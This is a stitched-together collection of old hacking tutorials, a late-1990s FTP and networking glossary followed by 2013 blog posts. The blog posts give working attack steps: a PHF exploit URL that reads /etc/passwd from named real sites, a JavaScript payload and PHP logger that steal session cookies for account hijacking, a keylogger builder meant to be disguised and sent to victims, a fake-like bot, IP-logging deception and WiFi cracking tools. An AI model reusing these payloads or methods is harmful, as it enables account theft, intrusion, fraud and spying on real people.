The Stupid Bug Corner
---------------------
I found this on an "elite" website made by a bunch of "elite" "hackers".
They said that in order to "hack an FTP" you need to connect to it and send the following commands:
quote user ftp
quote cwd ~root
quote pass ftp
Basically, what the so-called hacker is trying to do here is to enter a username to get into the system, change the user to root(7) and then enter a password for the username.
This only works on VERY badly-configured FTP servers (the author mentioned that "this doesn't work on every FTP server". Well, I've got news for you - this doesn't work. Period. Unless you're talking about some 5 years old boy who just got a computer and clicked on some buttons and accidently set up an FTP server).

Appendix A: the SYST command
----------------------------
Entering the SYST command while connected to an FTP server often reveals valuable information on a system, such as the OS, which version and information about the FTP server.
Get access to an FTP server somehow (by using a username and a password you know or by using anonymous login - login: anonymous password:your-email-address@your.isp. You could also enter someone else's Email address, the server doesn't actually verifies the address you send or anything) and then type the SYST command.

Newbies Corner
--------------
1. Protocol - a set of rules and regulations, similar to a language. When two computers know the same protocol, they can use it to communicate with each other.

2. Port - (for the more technical explanation of what ports are, see the end of this explanation) ports are like holes that enable things (data, in this case) to come in or out of them.
There are physical ports and software ports on your computer. Physical ports are those slots on the back of your computer, your monitor etc'. Now, software ports are used when connecting to other computers.
For example: I just bought a new computer and I want to turn it into a webserver (I want to enable people to access selecetd web pages, pictures, cgi and java scripts or applets, programs etc' that are located on my computer). In order for that to happen, I need to install a webserver software.
The webserver software opens a port on my computer and names it port 80. Then it listens to incoming connections on that port.
When someone starts his Internet browser (Netscape, Lynx, Microsoft Explorer etc') and surfs to my website, his browser connects to my computer on port 80 and then sends HTTP commands that my webserver program can understand into it.
My webserver program quickly picks up the incoming data and then sends it back into a port that the surfer's browser opened on the surfer's computer. The browser will listen on that port and wait for the data (the HTML page, the picture, the program etc') to come in through it.
There are different ports for different services (we'll get to that) so data won't mix up. Imagine your browser getting data your FTP client was supposed to get.
I hope you got the main idea of what a port is.
Now, there are three kinds of ports: well-known ports, registered ports and dynamic/private ports.
The well known ports are those from 0 through 1023. These are default ports for several services (a webserver is a service because it listens for connections from remote computers and then sends something back). For example: the default port for webservers is 80. Else, how would your browser know which port he has to access?
Now, the registered ports are those from 1024 through 49151. These ports are reserved for several programs. For example: ICQ (www.icq.com) reserves a port and listens to incoming messages on it.
The dynamic and/or private ports are those from 49152 through 65535, and can be used by anyone for any given purpose.

"Techy Explanation" - To grant simultaneous access to the TCP module, TCP provides a user interface called a port.
Ports are used by the kernel to identify network processes. These are strictly transport layer entities (that is to say that IP could care less about them).
Together with an IP address, a TCP port provides provides an endpoint for network communications.
In fact, at any given moment *all* Internet connections can be described by 4 numbers: the source IP address and source port and the destination IP address and destination port.
Servers are bound to 'well-known' ports so that they may be located on a standard port on different systems.
For example, the telnet daemon sits on TCP port 23, the FTP daemon sits on TCP port 21, the rlogin daemon sits on TCP port 513 etc'.

Important note about well-known ports: services (daemons waiting for incoming connections that serve people in some way) on these ports can be only ran by root, so inferior users won't start messing up with important ports.

3. Mirror site - a website which is an exact copy of the original website which is hosted by a different server.
Mirror sites can be used to speed up downloads/uploads. For example: instead of downloading/uploading from/to the main tucows webserver, located somewhere distantly from my home, I can simply do it from one of their Israeli mirrors (mirror site located in Israel, my country) and that way the downloads/uploads would go faster.

4. Path - UNIX example: if a file is located at /etc/passwd, the file's path would be /etc.
          DOS/Windows example: if a file is located at c:\windows\win.exe, the file's path would be c:\windows.
There are two kinds of paths: a complete path and a relative path.
          Complete path on DOS/Windows: if the file is located on c:\program files\quickview plus\ then this is the file's complete path.
          Complete path on UNIX: if the file is located at /usr/local/sbin then this is the file's complete path.
          Relative path on DOS/Windows: if the current directory (the directory you are on at the moment) is c:\windows and the target file is located at c:\windows\temp then the relative path to this file is temp.
          Relative path on UNIX: if the current directory is /usr/nobody and the file is located at /usr/nobody/public_html/cgi-bin then the file's relative path is public_html/cgi-bin.

5. Client / Server programs - A client program is a program that uses a resource offered by another program/computer.
A server program is a program that supplies resources to client programs.
Example: Client=Netscape Navigator. Server=Apache version 1.6.6 (a webserver, meaning a program that lets people who use Internet browsers to download specific web pages, pictures, files etc' from the computer it is installed on).

6. How to find out information about remote hosts - the best way to find out information is too look at daemon(6) banners. Daemon banners are small pieces of information some daemons return when connected to in order for the remote machine (the one connecting to the daemon) to know how to interact with them better.
Try connecting to port 80 (webserver) and sending some commands like get and then looking at the banner. You may also try Sendmail (see next tutorial) on port 25, Telnet on port 23, FTP on port 21 or whatever you can come up with.

7. Daemon - a program that listens for incoming connections from remote machines on a specified port(2) and interacts with them.

8. Root - also referred as superuser, because his permissions are endless. His UID (User ID number, an identification number and user on a UNIX system has) and GID (Group ID. You can create groups and give them several permissions. For example: everyone from the accounting department can read and execute all the files on this directory, etc') are always 0 (except on very altered boxes).
Once you are root, you can do practically anything on a system.
Core Dump - when a program crashes it dumps all the core (all the info it handles that isn't saved on disk, meaning all of the program's stuff that are on the RAM chip) into a temporary file.

9. DoS - Denial of Service. A nuke in dummies language. Some kind of an attack that causes the target computer to deny some/all kinds of services to the users of that computer (including remote users).
For example: Winnuke (also known as OOB), the simplest DoS in the world.
(Taken from Spikeman's DoS site) This denial of service program affects Windows clients by sending an "Out of Band" exception message to port 139, which does not know how to handle it. This is a standard listening port on Windows operating systems. Users of Win 3.11, Win95, and
Win NT are vulnerable to this attack. This program is basically a nuisance program, but it is being widely circulated over the internet now. It has become a bother in chatrooms and on IRC. By using your IP# and sending OOB data to port 139, malicious users can disconnect you from
the net, often leaving you with low resources and the blue tinted screen. Some of you may have been victims already. If this happens to you on Win 95, you will see a Windows fatal error message similar to the following:
Fatal exception 0E at 0028: in VxD MSTCP(01) + 000041AE.
This was called from 0028: in VxD NDIS(01) + 00000D7C.
Rebooting the comp should return it to normal state.

Patches ("fixes") For WinNuke (OOB)
-=-=-=-=-=-=-=-=-=-=-=-
Additional Information on WinNuke
http://support.microsoft.com/support/kb/articles/Q168/7/47.asp
Windows 95 Patches
http://support.microsoft.com/download/support/mslfiles/Vipup11.exe
http://support.microsoft.com/download/support/mslfiles/Vipup20.exe (for Winsock 2.0*)
http://www.theargon.com/defense/nuke/index.html
Please read notes referring to 95 patches before installing.
Which version of Winsock do you have on your Windows 95 PC?
http://premium.microsoft.com/support/kb/articles/Q177/7/19.asp
http://www.theargon.com/defense/nuke/index.html
Windows NT 4.0 Patch
http://support.microsoft.com/support/kb/articles/Q143/4/78.asp
http://www.theargon.com/defense/nuke/index.html
Please read notes referring to Windows NT patches before installing.

More info on DoS attacks can be found at Spikeman's DoS site: http://www.genocide2600.com/~spikeman/main.html

* I do not know it it will work on newer versions of Winsock, so you'd better downgrade to Winsock 1.1 (the version that comes with Windows 95) by going to Control Panel, Network and removing TCP/IP and Dial Up Adapter(11) and then readding them (click add, choose protocol and in the company frame choose Microsoft and you'll find TCP/IP. For DUN do the same but choose adapter instead of protocol).
After you finish downgrading reupgrade to Winsock 2.0, apply the patch (Vipup20.exe) and then upgrade to newer versions of Winsock.

10. Flames - the action of flaming someone (send him angry mail about things he has done, opinions he has etc' which you do not agree with).

11. DUN - Dial Up Adapter. Basically it's the Windows program that dials to your ISP(12).

12. ISP - Internet Service Provider. A company that provides Internet services, such as Internet connectivity, web hosting, Email services etc'.

13. Distro - Distribution. Since UNIX is not a registered patent, trademark, copyrighted or whatever there are many distributions (software packages) of it. Every distro has it's own advantages and disadvantages (example: Redhat is the best for beginners).

Next Tutorials
--------------
The next tutorial will be about Sendmail, the buggiest daemon on earth - what is Sendmail, Sendmail commands, how to hack through Sendmail, how to send completely untracable mail, a newbies corner (what is a daemon, how to trace mail etc') and much much more.
If this tutorial scores 7 points out of 10, then the Sendmail tutorial with score 12. First of all, it's gonna be veery looong and it'll have lots of side tips and thorough explanations about security holes and tips and tricks and tons of cool stuff I havn't thought of yet.
Besides, I did this tutorial in a rush 'cause I didn't have much time to work on it*, but summer vacation is coming up so I'll have plenty of time to work on the Sendmail tutorial.
The 3rd tutorial will be probably about UNIX Shell Programming. I don't wanna give away any details right now, and besides - I'm not so sure about this title. Maybe I'll change it to an "All you wanted to know about IRC wars and never had the guts to ask" tutorial. Who knows.
I'll set up a electronic poll soon so you'll be able to vote on that subject or suggest other titles (subscribe to the mailing list and you'll be notified when it's ready. To subscribe, go to blacksun.box.sk and go to the Mailing List page).
For more information, head down to blacksun.box.sk. Don't forget to drop us a line!

* Just installed Redhat 6.0. Yeah, yeah, I know, it's not exactly the best Linux distro(10) out there (I'm trying not to offend all of you Redhat users out there), but I wanted to see how it looks and everything.
I gotta tell you, the installation is EEE-ZZZ comparing to other distros, and it's great for beginners.

Note: before I'll release the Sendmail tutorial I will send out some mini-tutorials, such as "Buffer Overflows", "Overclocking", "RM Networks" etc'.

Other Tutorials
---------------
Overclocking.
RM Networks Hacking.
Ad and Spam Blocking.
Sendmail (creating fake mails and hacking servers that run Sendmail).
Get them all at blacksun.box.sk, or join the mailing list at blacksunresearch.listbot.com.

Bibliography
------------
BugTraq Archives - http://www.securityfocus.com/level2/bottom.html?go=search
RootShell - http://www.rootshell.com
Fyodor's Exploit World - http://www.insecure.org/sploits.html
Packet Storm - http://packetstorm.harvard.edu
X-Force Search (simplest) - http://www.iss.net/cgi-bin/xforce/xforce_index.pl
Slashdot - http://www.slashdot.org
Spikeman's Denial Of Service Website - http://www.genocide2600.com/~spikeman/
PC Magazine - http://www.pcmagazine.com

How To Hack Web Servers

2013-01-05T05:45:00.002-08:00

In my previous posts i will tell about some basics of File Transfer Protocol (FTP) and also some networks hacks. Previously i also write how to hack a website using Remote File Inclusion (RFI) but today i will explained how to hack a website using web server it is different from previous one. I am asked at least 5 or more times a day by young, beginning
"hackers",   "How can I hack?" or "Is there a way to hack a web site?"
Well there is. There are, in fact, literally hundreds of ways to do this. I
will discuss a few in this text to get you started. Every hacker has to start
somehow and hacking web servers and ftp servers is one of the easiest ways.
If you are reading this I am assuming that you already have a basic knowledge
of how web servers work and how to use some form of UNIX. But I am going to
explain that stuff anyway for those of you who don't know.

Part 1: Simple UNIX Commands

        Most DOS commands have UNIX and Linux equivalents. Listed below are
some of the main commands you will need to know to use a shell account.

HELP = HELP
COPY = CP
MOVE = MV
DIR = LS
DEL = RM
CD = CD

        To see who else is on the system you can type WHO. To get information
about a specific user on the system type FINGER . Using those basic
UNIX commands you can learn all you need to know about the system you are
using.

Part 2: Cracking Passwords

        On UNIX systems the file that contains the passwords for all the users
on the system is located in the /etc directory. The filename is passwd. I bet
your thinking...."Great. All I have to do is get the file called /etc/passwd
and I'll be a hacker." If that is what you are thinking then you are dead
wrong. All the accounts in the passwd file have encrypted passwords. These
passwords are one-way encrypted which means that there is no way to decrypt
them. However, there are programs that can be used to obtain passwords from
the file. The name of the program that I have found to be the best password
cracker is called "Cracker Jack." This program uses a dictionary file composed
of thousands of words. It compares the encrypted forms of the words in the
list to the encrypted passwords in the passwd file and it notifies you when
it finds a match. Cracker Jack can be found at my web site which is at
http://www.geocities.com/SiliconValley/9185
        Some wordlists can be found at the following ftp site: sable.ox.ac.uk/
pub/wordlists. To get to the wordlist that I usually use goto that ftp site
then goto the American directory. Once you are there download the file called
dic-0294.tar.Z which is about 4 MB. To use that file it must be uncompressed
using a program like Gzip for DOS or Winzip for Windows. After uncompressing
the file it should be a text file around 8 MB and it is best to put it in the
same directory as your cracking program. To find out how to use Cracker Jack
just read the documentation that is included with it.

Part 3: The Hard Part (Finding Password Files)

        Up till now I have been telling you the easy parts of hacking a
server. Now we get to the more difficult part. It's common sense. If the
system administrator has a file that has passwords for everyone on his or her
system they are not going to just give it to you. You have to have a way to
retrieve the /etc/passwd file without logging into the system. There are 2
simple ways that this can sometimes be accomplished. Often the /etc directory
is not blocked from FTP. To get the passwd file this way try using an FTP
client to access the site anonymously then check the /etc directory to see if
access to the passwd file is restricted. If it is not restricted then download
the file and run Cracker Jack on it. If it is restricted then try plan B. On
some systems there is a file called PHF in the /cgi-bin directory. If there
is then you are in luck. PHF allows users to gain remote access to files
(including the /etc/passwd file) over the world wide web. To try this method
goto your web browser and type in this URL:
http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Then substitute the site you are trying to hack for the xxx.xxx.xxx.
For example, if I wanted to hack St. Louis University (and I have already) I
would type in http://www.slu.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Don't bother trying www.slu.edu because I have already done it and told them
about their security flaw.
Here's a hint: try www.spawn.com and www.garply.com

Yahoo Account Hacking / Hack yahoo Account by Cookies stealing to browser / Session Hijacking

2013-01-05T05:39:00.001-08:00

In my previous i write about hacking truths manual (Ebook) in which a complete guide about how to hack any email account and in an other post i explained how to get ip address email sender using his mail. Also i have write details of hacking tutorials and tools in a post. Today i will explain about how to hack yahoo account using cookies very rare and effective method.

Hack Yahoo Account by Cookies Stealing very Simple Way, by Cookies Hijacking.
Follow Steps and Learn.
This is very Simple Tutorial and working..
Step 1: Download this Script
Step:2 Download and extract files into your hard drive.
Step:3 Create a account in any ftp hosting site i suggested http://110mb.com
Step4: Login to your account and upload 4 files into your ftp account...see screenshot below

Step5: Give this code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));
He would again redirected to his yahoo account.

Step6. Open the hacked.php . The password is 'explore'.

You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password

You can also read this tutorial about How To Make Cookie Logger/ Cookie Stealer.

How to Make Cookie Logger / Cookies Stealing Tutorial

2013-01-05T05:36:00.000-08:00

What is cookie logger ?

In my previous post i explained How To Hack Yahoo Account Using Cookie Stealing To Browser.

Today i will explained how to make your own cookie logger and hack victims account. A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif

Click To Download Script here

Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;

if (isset($_GET["cookie"]))

{

if (!$handle = fopen($filename, ‘a’))

{

echo “Temporary Server Error,Sorry for the inconvenience.”;

exit;

}

else

{

if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE)

{

echo “Temporary Server Error,Sorry for the inconvenience.”;

exit;

}

echo “Temporary Server Error,Sorry for the inconvenience.”;

fclose($handle);

exit;

}

echo “Temporary Server Error,Sorry for the inconvenience.”;

exit;

Step 3: Create a new Notepad File and Save it as logfile.txt

Step 4: Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php

logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)

fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://0fees.net

Step 5: Go to the victim forum and insert this code in the signature or a post :

Click to download here

Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.

Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.

Get Unlimited FB Page Likes (2013)

2013-01-04T11:25:00.002-08:00

Hello Friends Previously i have posted about How To Post Facebook Status With Some Else Account and also How To Get Someone IP Address And Location In Facebook. Today i have decided to write about how to get Facebook Likes in just one week.

Facebook is very popular and nearly all people use this and many of them are very curious about how to get more likes on Facebook Page so this post is dedicated to you.
Requirements:

*Firefox
*IMacros Firefox Pluginhttps://addons.mozilla.org/en-US/firefox...r-firefox/
*My JavaScript AddMeFastAutoLiker.js
*Addmefast Account Register AddMeFast - FREE Social Promotion
*Facebook account [/font]

1.Open Firefox then download the Imacros plugin link above.
2.Now download my Javascript

3.Once downloaded go to documents-->imacros-->Macros-->Demo-Firefox and drop the
download addmefastbot.js script file in here should look similar to this...pic bellow.

4.Now close Firefox and open it again so the js file will be in imacros.

5.Register an account with AddMeFast link above in requirements

6.Now go to MySites on Addmefast then hit the plus sign choose facebook likes
and type in your facebook page you want liking in the URL also make sure daily clicks
and total clicks are set to OFF and in CPC set to 8 and hit save changes
Note:If you want youtube subscribes just change it to youtube subscribes or likes or
facebook subscribes with the same setup.

7.Now open up a new tab on firefox and login with you facebook account make sure its a shit
account because the script is gonna be earning you loads of points by liking 1000s of pages.

8.Now close the facebook tab stay on addmefast page and doubleclick the imacros icon
top right corner of your firefox page blue icon then a imacros tab should appear
left hand side of the browser

9.Now double click Demo-Firefox then double click AddmeFastBot.js should look like this:

10.Now just type in there 1000000 and click okay

11.Now this will just start earning you points and because you added your link at the beggining
of the tutorial you will now constantly get likes aslong as your bot is running.

Personally i got 100 page likes in like 2 hours and i just left it running now the bot is running
go and check your facebook likes,subs or youtube views,subs or likes you will be impressed as long
as you leave the bot running you will keep getting boosted
=================================================

My JavaScript AddMeFastAutoLiker.js

//Made by thearmykid AKA Kris ProHacks

var macroStart;
macroStart ="CODE:";
macroStart +="SET !ERRORIGNORE YES" + "\n";
macroStart +="SET !TIMEOUT_TAG 1" + "\n";
macroStart +="SET !TIMEOUT_STEP 1" + "\n";
macroStart +="SET !TIMEOUT_PAGE 30" + "\n";
macroStart +=" SET !REPLAYSPEED FAST" + "\n";
macroStart +="SET !TIMEOUT_MACRO 150" + "\n";
macroStart +="TAB T=1" + "\n";
macroStart +="WAIT SECONDS=0" + "\n";
macroStart += "TAG POS=1 TYPE=A ATTR=TXT:FacebookLikes" + "\n";
macroStart +="WAIT SECONDS=2" + "\n";
macroStart += "TAG POS=1 TYPE=A ATTR=TXT:Like" + "\n";
macroStart += "TAB T=2" + "\n";
macroStart += " FRAME F=0" + "\n";
macroStart += "TAG POS=1 TYPE=INPUT:SUBMIT ATTR=VALUE:Like" + "\n";
macroStart += "TAB T=2" + "\n";
macroStart +="WAIT SECONDS=3" + "\n";
macroStart += "TAB T=1" + "\n";
macroStart += "TAB CLOSEALLOTHERS" + "\n";
macroStart +="WAIT SECONDS=2" + "\n";
macroStart +="TAG POS=1 TYPE=INPUT:BUTTON FORM=ID:form1 ATTR=ID:subscribeButton" + "\n";
macroStart +="WAIT SECONDS=3" + "\n";
macroStart +="TAG POS=1 TYPE=IMG ATTR=SRC:http://www.addmefast.com/images/layout/bottom_arrow.png" + "\n";
macroStart +="WAIT SECONDS=2" + "\n";
macroStart += "TAG POS=1 TYPE=A ATTR=TXT:Like" + "\n";
macroStart += "TAB T=2" + "\n";
macroStart += " FRAME F=0" + "\n";
macroStart += "TAG POS=1 TYPE=INPUT:SUBMIT ATTR=VALUE:Like" + "\n";
macroStart += "TAB T=2" + "\n";
macroStart +="WAIT SECONDS=2" + "\n";
macroStart += "TAB T=1" + "\n";
macroStart += "TAB CLOSEALLOTHERS" + "\n";
macroStart +="WAIT SECONDS=2" + "\n";
macroStart +="TAG POS=1 TYPE=INPUT:BUTTON FORM=ID:form1 ATTR=ID:subscribeButton" + "\n";
macroStart +="WAIT SECONDS=3" + "\n";
macroStart +="TAG POS=1 TYPE=IMG ATTR=SRC:http://www.addmefast.com/images/layout/bottom_arrow.png" + "\n";
macroStart +="WAIT SECONDS=2" + "\n";
macroStart += "TAG POS=1 TYPE=A ATTR=TXT:Like" + "\n";
macroStart += "TAB T=2" + "\n";
macroStart += " FRAME F=0" + "\n";
macroStart += "TAG POS=1 TYPE=INPUT:SUBMIT ATTR=VALUE:Like" + "\n";
macroStart += "TAB T=2" + "\n";
macroStart +="WAIT SECONDS=2" + "\n";
macroStart += "TAB T=1" + "\n";
macroStart += "TAB CLOSEALLOTHERS" + "\n";
macroStart +="WAIT SECONDS=2" + "\n";
macroStart +="TAG POS=1 TYPE=INPUT:BUTTON FORM=ID:form1 ATTR=ID:subscribeButton" + "\n";
macroStart +="WAIT SECONDS=3" + "\n";
macroStart +="TAG POS=1 TYPE=IMG ATTR=SRC:http://www.addmefast.com/images/layout/bottom_arrow.png" + "\n";

var i=0;
var n=prompt("Input the number of Facebook loops.",5)

for (i=1; i <= n; i++)
{
iimPlay("CODE:"+"URL GOTO=www.addmefast.com")

iimPlay(macroStart,25)

iimDisplay("Current loop is: "+i)

iimDisplay("Refreshing the page")
iimPlay("CODE:"+"TAB T=1\n"+"TAG POS=1 TYPE=INPUT:BUTTON ATTR=NAME:reload&&VALUE:Reloadthepage\n"+"REFRESH")

iimDisplay("New Page")

}

Get someone's IP Address With Their Location in Facebook Or Anywhere

2013-01-04T11:24:00.000-08:00

In my previous posts i have posted about How To Get Unlimited Likes On Facebook and also How To Post Facebook Status With Someone Else Account. Today i am back with another tutorial is which I will show you how to get someones IP address with their exact location (with Latitude and Longitude) with the helps of IP Logger, if you never heard of it than we are going to do it today!

Ok! lets begin the tutorial

Step 1 : Go to this site http://blasze.com/iplog/index.html# and there you enter any link (for example http://www.google.com) on the Box " Enter URL or Tracking Code" and than click on "Create URL"

Step 2 : First copy the Access Code (example : Your access Code Is : Copy this => 1qj3oh) than copy the link generated by that IP Logger website and put it into bit.ly or adf.ly link first so that your target don't know it or post it to your facebook profile and clear the link so that no one knows (for example if you type in http://www.google.comin the "Enter URL or Tracking Code" Box. And after getting the code you pasted the generated link in your status. After your Facebook friends would click on that link and will be redirected directly to Google without any problem, with this they will think that the link is really of Google and it will show http://www.google.com in the search box above)

Step 3 : Go back to blasze.com/iplog and Type in the access code in that "Enter URL or Tracking Code" Box. There you will have their IP if someone clicks on your link.

Step 4 : After clicking on Track URL you will get something like this than click on MAP to know more details about the target.

please do not leech this

Post Facebook status with someone elses account!

2013-01-04T11:20:00.002-08:00

Really simple and noob friendly tutorial, still works like a charm.

1) Get them to click on this link (don't worry, it's not infected or anything so you can click on it):https://m.facebook.com/upload.php?_rdr

2) Tell them to tell you the email that is under "Email a photo or video to" (It is different for every person. If you want hack your teacher I suggest getting on their PC while they are out of the class.)

3) Go to your email account and send an email to the email they gave you. Write your message in the Subject box only. After you send it it should show up on their timeline that they posted your message via Email.

How To Unblock Or hack Cyberoam To Access The Blocked Sites

2013-01-04T11:17:00.001-08:00

In my previous posts i have written about How Firewalls Works and Also about How To Block A Website. After that i hope you understand much about Firewall so now i will teach you How to unblock cyberoam.

Recently Our College has uploaded the Cyberoam client on the college server and we cannot access 90% sites through this ... whatever the site we want to open it says it was blocked by ur Administrator... what the f*ck sites like opera and firefox are blocked... Really ROFL... After Got fked up from this I am giving you all the Detailed and 100% working Hack for cyberoam and how to unblock any site in college as Most of the colleges have cyberoam Installed...

WHAT IS CYBEROAM ??

Cyberoam’s all-inclusive UTM solution offers a well-coordinated defense through tightly integrated best-of-breed security solutions over a single interface -Stateful inspection firewall, VPN, gateway anti-virus, gateway anti-spam, gateway anti-malware, intrusion prevention system (IPS), content filtering, bandwidth management (QoS), multiple link management and enhanced user-based reporting.

That means it maintains records "Who is Doing What" ?

HOW TO UNBLOCK CYBEROAM TO ACCESS BLOCKED SITES ??

First of all I will inform you all that cyberoam is highly secured internet client and it blocks all the types of proxies like http,CGI, socks(4/5), Ftp, highanonimity ...In short All..

As you all know that every Programmer leaves aleast a One Loop Hole in its Programming or software Design . Why I am saying this is because Cyberoam has also left this Loop Hole in its Design .. Now what is this loop Hole ??

Its HTTPS Loop HOLE...

HOW HTTPS WILL GOING TO UNBLOCK SITES ??

Https are SSL secured http clients ... and these are most secured Sites on the Network , that's why cyberoam Leaves it ..

Now the Main Point To access the Blocked sites you have to use the Https based Proxies.

Most of Https based Proxies are Paid so to search on Net for free Https Based Proxies is a Waste of Time...

I am Providing You the One Such Free Proxy service to access blocked Sites On the Cyberoam.

So feel free to surf anysite in your college ... the Best thing is that This site will not allow cyberoam Admin to track You ..

UNBLOCK CYBEROAM

Click on the above Link and surf Freely any site in your college...You need to accept the certificate provided by the Site to Use It... As your web web browser show the Certificate accept statement at the First time you visit the Https Site.

WEP Password Cracker: Wireless Network Hacking | Download Wi-fEye

2013-01-04T11:15:00.001-08:00

I have posted previously about Wifi Hacking Tools and also How To Hack Wifi Using Backtrack 5. This is posted for those who can't understand above methods clearly they can easily use this tool.

WEP Password Cracker: Wireless Network Hacking | Download Wi-fEye

Wi-fEye is designed to help with network penetration testing, Wi-fEye will allow you to perform a number of powerful attacks Automatically, all you have to do is to lunch Wi-fEye, choose which attack to perform, select your target and let Wi-fEye do the magic !!.

Wi-fEye is divided to four main menus:

Cracking menu: This menu will allow you to:

Enable monitor mode
View avalale Wireless Networks
Launch Airodump-ng on a specific AP
WEP cracking: this will allow you to perform the following attacks automatically:

- Interactive packet replay.
- Fake Authentication Attack.
- Korek Chopchop Attack.
- Fragmentation Attack.
- Hirte Attack (cfrag attack).
- Wesside-ng.

WPA Cracking: This contains the following attacks:

- Wordlist Attack
- Rouge AP Attack.
2. Mapping: this menu will allow you to do the following:

Scan the network and view the connected hosts.
Use Nmap Automatically.

3. MITM: this menu will allow you to do the following Automatically:

Enable IP forwarding.
ARP Spoof.
Launch ettercap (Text mode).
Sniff SSL/HTTPS traffic.
Sniff URLs and send them to browser.
Sniff messengers from instant messengers.
Sniff images.
DNS Spoof.
HTTP Session Hijacking (using Hamster).

4. Others: this menu will allow you to o the following automatically:

Change MAC Address.
Hijack software updates (using Evilgrade).

DOWNLOAD HERE

If you can't succeed using above method then you can also try

Hack Wifi Password In Windows
Wifi Password Hack
How To Hack Into Computers Through WiFi

Sharecash Downloader V10

2012-12-28T10:42:00.002-08:00

In my previous posts i have posted Download From Sharecash Without Doing Surveys now i have posted another one Enjoy.
How to use it:

1. Type in the $harecash link you want to download in the textbox.

2. Choose what kind of background your link you want to download has (you can see the examples).

3. Press "Navigate to ShareCa$h Link" button.

4. Wait for 30 seconds - 1 minute. Depends on how fast your Internet speed is.

5. Click "Download".

Screenshot:

Download

Any Problem Then Tell Me.

If the above posts does not work on your PC then you can also try this.

Second Method To Download From Sharecash

Download Facebook Hacker V1.0 A Keylogging Software

2012-12-28T10:37:00.000-08:00

Previously i have posted How To Get Someone IP Using Facebook and also How To Post Facebook Status From Someone Else Account and very best one How To Get Unlimited Like For Your Facebook Pages. Today i have decided to post about a Facebook Keylogger. Don't know what Keylogger do just read here what is Keylogger and how it works then apply the trick below.

This tool is extremely easy to connect and use. All you have to do is give an email address and a password where the stolen information is to deliver. Can’t be easier than that.

Just type in the email address and password and then click on the build button. A new “SERVER.EXE” file will be created and most of the work is already done. Now the big part comes. Just send this file to the victim. Rename it, change the icon and make it more presentable so that the victim opens it for sure.

As soon as the victim opens the file, Server.exe will get all the passwords saved and facebook account credentials and will give them to you. To avoid detection, the facebook Hacker will also look for all the processes related to a security suite and kill them upon detection. The most important thing this software does is it kills all the security suite detecting it.

Download

Given Away This Month: A4DeskPro Flash Website Builder For Free

2012-12-23T10:25:00.002-08:00

A4DeskPro Flash Website Builder is a very easy-to-use software which will help you create Flash website and presentations, with multiple menus and sub-menus, with stunning flash animation effects and color with just few mouse clicks – right on your desktop computer (or notebook). NO coding knowledge, NO Internet connection, and NO purchase of high priced commercial flash editing software required.

A number of my clients have expressed interest in developing Flash websites and micro sites. As someone who is not familiar with Flash programming, I've had to shy away from these projects and have lost money as a result. I was recently introduced to A4DeskPro Flash Website Builder which claims to be able to produce Flash websites with no programming knowledge. Is this a solution to my problems? What now follows is my review of this software package.

After a painless and professional installation process I start up the application and choose to build a new website. A4DeskPro comes packed with templates and it is from one of these templates that you will build your new site. The templates are professionally created and cover a wide range of themes that should cater for the vast majority of needs.

On picking an existing template, the application loads with a suggested menu structure. Top level menu nodes can be edited or disabled and sub menus can be added, edited and removed. You need to ensure that the template that you choose has enough top level menu nodes, but this will not be a problem for 99% of websites out there.

Editing the content for each menu and sub menu node is equally straightforward. You enter your HTML code in the bottom half of the screen and then view the results of your edits in the top half. If you don't know HTML code, then the application offers helpful buttons to make the process easy.

A4DeskPro allows easy editing of the site title and meta tags for both your keywords and description. A useful feature as these are used by many search engines. It also supports user friendly methods of adding individual pictures and photo albums, background music, forms and video to your site. Note that your host must support php to use the contact form.

You can save your website with a few clicks and also preview the site in a web browser. Finally, the application helps you publish the finished website with its built in FTP wizard.

Creating a new website is a breeze with A4DeskPro. The application is intuitive and user friendly. I didn't need to turn to the extensive online help at all before I had created, edited and published my first flash website.

Pricing is geared around use of the templates. You can either register one template for use on one site forever for a one off payment of $49.95, or you can choose from a number of access plans. These access plans allow you to make as many websites as you want and then edit those websites forever.

$129 allows creation of as many websites as you want for three months from any of their templates. Once built, you can edit these sites after the three months have expired but you can't create new ones. $575 allows unlimited creation of unlimited websites using any the templates. There is currently a sale which slashes these prices, so get in quickly to benefit!

But i am giving this software for free with unlimited websites.

Just Email me

With your

Name=

Country=

Hobby=

My Email Address= Hackerx312@hotmail.com

Enjoy my gift of worth 575$.

WiFi Hack AIO 2010

2012-11-24T10:59:00.002-08:00

I have also posted other methods in my previous posts WEP Password Cracker and Hack Wifi Password With Backtrack 5.

WiFi Hack AIO 2010
163.11mb

This time we bring you the best software to hack the WiFi networks 2010.
The compilation includes powerful encryption software in network
detection and ideal for hacking WiFi networks. Download Programs to hack
Free Full WiFi networks.

This AiO contains:

Windows Tools 1

WiresHark
AirSnare
WirelessKeyView
Wifi Monster
NetStumbler
